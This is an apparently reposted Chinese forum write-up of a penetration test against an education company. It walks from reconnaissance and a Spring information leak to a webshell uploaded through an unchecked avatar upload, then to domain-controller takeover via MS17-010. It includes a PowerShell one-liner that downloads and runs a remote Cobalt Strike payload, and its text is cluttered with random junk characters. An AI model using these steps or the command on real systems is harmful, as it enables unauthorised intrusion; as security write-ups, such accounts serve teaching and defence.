|
+ T1 ~# S' Q o
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路! j1 M' |5 ?& E4 u
7 A9 g, [) c7 O6 q* X$ \# N
B/ f+ F# T' p; q; F " Q5 N) ]" _8 d5 T& j
. Q" _' k; x' z( t" N1 u B( s5 Q/ ^
正文# Y' j* e- v [
5 ^' {# Q7 g! P% j6 Q. n% d9 R
/ ?0 F2 c2 h% T: U- ^
" L: P: @6 O* h2 x3 m u
" |* v G1 x* g% c2 z0 K2 B. h" q$ q, f* F+ ?$ ~* k. Q; A- b
目标:www.xxxx.com(一家教育机构)
k4 k. r, U- V# A2 U打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
/ ?" y3 R9 |8 M: g+ F* V
( {/ e1 e8 w7 W3 T$ G2 d9 ^) Z+ f5 ~- O$ E; U, W# t
2 S. V0 b, ?, D
" t3 i( M( _' d& I1 h
# {* v f% u) H( Z! K5 ] 进行了简单的信息搜集
l9 @+ t) F% K8 J! l+ P- m & `7 R' Q/ I: R& i* ?
3 I7 R3 @7 y Y+ p) S
! L U- l- O! ?# |
) q0 A! g# u" X3 q7 f$ U
子域名搜集( g* }/ Q8 M) [5 N9 h
9 u5 }* f* N' ]" C3 P E
: u" H1 V! O& a$ h' R* s
# p$ u& C$ J! I( n% b9 B
_# ]7 `8 `- S
) |& y) B& D9 o- U* K% g: ~ fofa找资产
. N# Z; r: J0 W8 \0 K8 d+ b/ B
8 x8 ? i9 |$ l" N8 ^4 x, a: u) X! p6 H6 t- m- |/ I K
7 f0 q0 p; d$ `4 r% |/ Z, }
8 r% ^/ Y7 k% M/ n
/ [& _; G7 \# s0 v* ^, r$ e2 G 6 O6 Z1 O' V2 S& _
- ?( W* J! d$ _3 |) J; F# M
一共七个资产。去重之后只有两个。
5 J$ W, i/ O& U6 ]$ ~0 q5 b. U
) N! J% E1 ?6 _* R- [$ c. m5 ~2 F- G5 r( N6 {8 }) ?9 E
+ P9 V# I' z( z
7 t: d" U9 J8 i/ j4 O4 O
目录探测
$ u& Q3 ?+ Y; v4 ]' V5 B! h d ) J. r) |8 f8 d8 F7 T2 _8 [
2 s7 G6 T0 D0 g4 `! E' ^! I7 `( q
U! w0 Y: H2 \9 E8 L6 j
- n" o# X, B# ^9 [/ o
9 U0 F; Q9 i, X% {+ g! Q3 p9 W8 \ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
0 X/ H1 G$ f( H1 b 6 l# l( g: Q3 E6 ~& ]6 `& d, J
. [' W2 q `8 y7 H q9 \
0 c! X, w0 M, u+ F# _5 o( U" s6 p
0 s" a2 x) \5 A7 s% g
我又尝试了通过修改返回包来绕过登录界面
- g5 Q; |/ z$ ^" J6 Z2 G ; @: P6 S J6 T
& y" f% a8 \1 P' F
j# a5 \- S# I1 I4 F! r2 d ! w9 ?) c4 Z5 `
( \/ r: l! v2 r B2 H
还是不行,尝试注入无果
5 n# y) m y+ _5 q9 i# C ) ^) B$ u- g3 n: p: D2 W3 x8 H
7 s: R( @6 h Y9 r
/ z% d5 j7 \) b; Q7 w & y2 d& p% B- d* S. ?+ |) Q9 S
5 ^& V+ {% Y9 f: J 不过我目录探测出了一处Spring信息泄露
# @6 K- E/ C5 T. c! e& ? 0 \; }3 |0 E5 r) i
8 q% f/ \$ E8 I& r; o
5 Z( I- a2 c, I' g- C$ N% Z) U) [( [7 _, m+ z" z
+ a/ Q& K2 `6 j0 ]' v, ?
0 T i( C: Y7 m' t( g6 V/ ~
3 C% g9 o4 R v& m! ^ @, T 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录+ o* i( f) }! J# V* n
' Y" Q- [* H K# ]; K- a
( A) h+ `* [, ^2 C$ R% d9 G; _ ' _, c8 G, s) [; T
d5 w' Q. L1 T2 l8 R# \/ P( Y
0 Y9 N/ ]4 d9 d 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。$ c0 O+ R+ Z1 n6 @* x3 {
, a" P4 M- ~! Z5 m+ Q% c. n2 j: c$ n3 j
2 @- O- r, @* _: w: }/ W
' c" [1 f0 k4 E2 G* n
, j# ?) I: g1 z4 D; R5 _
8 q) ~( a! o0 O" ~: Z 获取有些师傅到这一步就手机抓包电脑测了。- j4 t8 i' i j% E+ @+ J& W
" s5 o( |$ u- H# X8 k7 j
- U& a& A9 w4 x ~; N- U' G
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。) E# q( o$ ^2 \( q9 n8 T" ^
8 H# X1 W" ~' K
6 K8 |1 K. e4 L 其中在一个公众号发现了小程序,可以进行注册。
% j/ I: ^ }: r) d8 d 1 `6 V* T9 C. b; @+ G: u
3 ~6 k% K" r4 o2 _. M" l9 _+ U: q
看到了头像上传,尝试上传获取WebShell
+ O! @- w- |8 P5 |6 c/ C3 S6 O + A; K c x& {1 u/ `
8 Q' p0 T9 H* R
4 T6 c' Q5 K; e: k. _ 9 H4 Y6 s# L% L2 ~ Y/ i9 p0 U
5 u; d' Y E7 P k8 e
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
7 T8 T8 V! C3 g! e: m) i
. @" B$ p% w( D" [3 X9 Q6 l/ x! l% U* l" C, K2 f- |* x) Z) u$ A
5 Z6 }. y+ d8 F# o& r' {% T l0 o4 |2 U
3 F5 l u. V# x8 ~" u* a( p5 `5 c M" E2 O* ]
然后上了大马2 z" A* j1 Z/ |6 e7 ~. P9 p# Y, ]1 ?1 f
$ ?; o! ]6 k* v5 b* f" W
( }' d8 [6 A8 v, t1 P. |- B
, t" {, E) ~6 [ 3 A+ d; e& b7 ?1 j% P+ y
+ ^7 O" t! }; j" C
- P* d0 q3 Y; v& {2 ~6 D8 n
0 V+ _0 T. i# f+ C: n
+ g& v" R3 m" d* { 通过翻找文件发现数据库账号密码
: B) R4 w9 U7 O/ I9 v6 C' H " n; l$ {! d7 K2 R
6 H7 C$ }5 \" ` A+ u, s1 d
- C/ [( r E9 @* }9 v# B8 B
3 Z. Y% Q5 b: L: ~# g% t* i/ w8 e; R5 y9 N2 r
--内网渗透! _4 u3 U w7 ^2 g- ^' ^( l2 Y# x
6 r5 i( u5 @$ }5 q6 h/ X. ^5 }1 D0 S- R" S" ]' r
直接通过powershell执行 cs上线
0 c' g( B; V: s J E
1 ?% @! h- k$ {: V
+ x1 G$ n* N% k) f& q& Z powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"+ }$ z6 w! X( x+ V5 ?" P' d3 ^3 z
9 A; l. B h; ~7 { o/ ]5 }6 l! m& j n" X$ q7 ~! C3 `
4 s; E0 ]1 L3 f1 w
+ o) q5 Z0 E0 `" F5 h
9 s/ b! h! J. }% A3 F 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破! n% h6 O* C5 L0 U
: O: m2 W0 j. D Q& O
6 _+ y/ u# z+ S. ?( {0 b1 k
$ t1 [- _2 k1 j4 b0 e/ v% N
( ]2 l# S! q0 O$ J% P: d m) w. ?2 j+ I. g+ K# ^; r8 `
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
) H% [9 r% x! r
8 h' `6 N: {; P0 _" [ 8 Q* w' ~/ y- {( ~/ m( ] f
+ u. j' c$ D6 m; k- G
' R' e; _8 w. Q2 y
+ I& `) E! l) l* {# R' H8 f
7 m5 l1 \ U5 H; o* l+ i
2 v2 T( e1 S5 P' A
- Q4 x3 _9 L& D4 E9 J+ d 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 ~- U% w8 B# x$ \! v! i
6 x1 v' c0 e$ Q( ~8 C2 \$ b) T
. M9 F, E( e9 U7 \6 a7 e
8 h" l3 \2 R- y
. }& {# P3 A( \2 m
/ @7 V! P) |, U' ?6 I9 @) a % e5 l2 f3 ?: q+ m' \+ T
2 g2 _% z4 f) j) n. f " k) j6 P! `' t& _) `7 N
/ M% |8 O) G+ [; _
# U( G' t+ O. L4 T# L5 n1 p1 C ; _5 e5 u. S: J/ n- H
! B0 U" @% ~" ~ $ ?' o) x8 }7 W# H" K
. O7 s U8 N/ b( D+ A) b. K9 ?
+ Z3 D9 _% T" u" ]8 j9 m 小结8 l- z/ \7 T# v. t
. c0 P# l# w. q* X- N
, i$ R# m; B# ^/ A/ u. `: L$ }
$ k$ |* W" ^5 ?+ F) D : a/ y3 d3 {1 Y R; k
' e7 i1 G$ i8 n' K: ^; o7 `
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!4 ]4 c! J# @& k ?% H# G
) t7 o: u6 V& @6 ^! C
$ i$ m0 C- B- @6 C6 p n% f ; E4 m2 J* Y" l# g
f. a) u: C# i+ ~0 Q' J. O4 ?& Q! i3 Z* t$ q
- * s- v9 w0 J8 v. H( L) ]
) g( |. W# t1 s6 D8 `9 U
. M. W0 {( f# |, U" P' c* C$ c -
5 v6 M4 {! d, u6 {* m * I% G2 }7 _1 w0 s0 ]
l: [2 I# C* ]4 P$ Z9 k
y# d. z, ^+ X3 O% i% G* ^ k: w; D! _# N# p
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
5 h7 a+ ?" A/ M. q; ]
0 @. C! T0 b6 X* N$ E' {4 w1 i1 v4 ]2 p" T6 l2 \
) u Q' ?& Y+ ?: m |